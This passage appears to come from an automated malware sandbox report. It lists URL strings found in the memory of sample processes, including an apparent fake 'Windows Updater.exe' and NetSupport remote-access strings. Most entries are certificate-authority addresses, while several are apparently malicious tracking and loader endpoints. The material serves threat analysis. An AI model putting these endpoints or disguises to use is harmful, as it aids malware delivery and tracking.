                                  Source: a1.exe, 00000014.00000003.2314749111.00000000011C1000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pstbbk.comAI_DeleteCadLzmaAI_IaLogInstallDataOnAnalyticsLogInstallDataAI_DATA_SETTER_4Advance
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://send.planewool.xyz/track_inl2.php?tim=1701869569&poid=2598&p=1.25
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://send.planewool.xyz/track_polos.php?tim=1701869569&rcc=US&c=2598&p=0.9
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://send.planewool.xyz/track_uki.php?tim=1701869569&rcc=US&c=2598&p=0.92
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2318044040.00000000043EF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317443500.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4546318478.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sidemark.xyz/
                                  Source: ZmWSzgevgt.tmp, 00000001.00000003.2102655489.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sidemark.xyz/i
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4550403877.0000000002424000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4546318478.0000000000976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000098D000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.000000000098D000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000961000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000098D000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/Q
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2005457089.0000000002560000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.exe, 00000000.00000002.4546319029.0000000000AE4000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.00000000037BD000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.000000000377A000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4550403877.000000000244B000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2010247622.0000000003490000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4550403877.000000000242C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyL
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2005457089.0000000002560000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.exe, 00000000.00000002.4546319029.0000000000AE4000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.00000000037BD000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4555717982.000000000377A000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000961000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000096B000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2010247622.0000000003490000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4550403877.000000000242C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/pill.php
                                  Source: ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/pill.phpSm
                                  Source: ZmWSzgevgt.tmp, 00000001.00000003.2102655489.0000000000961000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sparksteam.site/pill.phpXm
                                  Source: a1.exe, 00000014.00000003.2487171415.0000000004382000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489984022.0000000004390000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486195028.000000000437E000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                                  Source: a1.exe, 00000014.00000003.2487171415.0000000004382000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489984022.0000000004390000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486195028.000000000437E000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://t2.symcb.com0
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648735062.0000000002744000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2730765657.0000000002744000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://tl.symcd.com0&
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2318044040.00000000043EF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317443500.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agenment.clo
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                                  Source: a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                                  Source: a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317443500.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                                  Source: a1.exe, 00000014.00000003.2318044040.00000000043EB000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2318044040.0000000004404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                                  Source: a1.exe, 00000014.00000003.2487451231.0000000005D4F000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486235644.0000000005D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                  Source: wmiprvse.exe, 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: wmiprvse.exe, 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                                  Source: wmiprvse.exe, 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: wmiprvse.exe, 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                                  Source: a1.exe, 00000014.00000003.2316716305.000000000433F000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.000000000433F000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
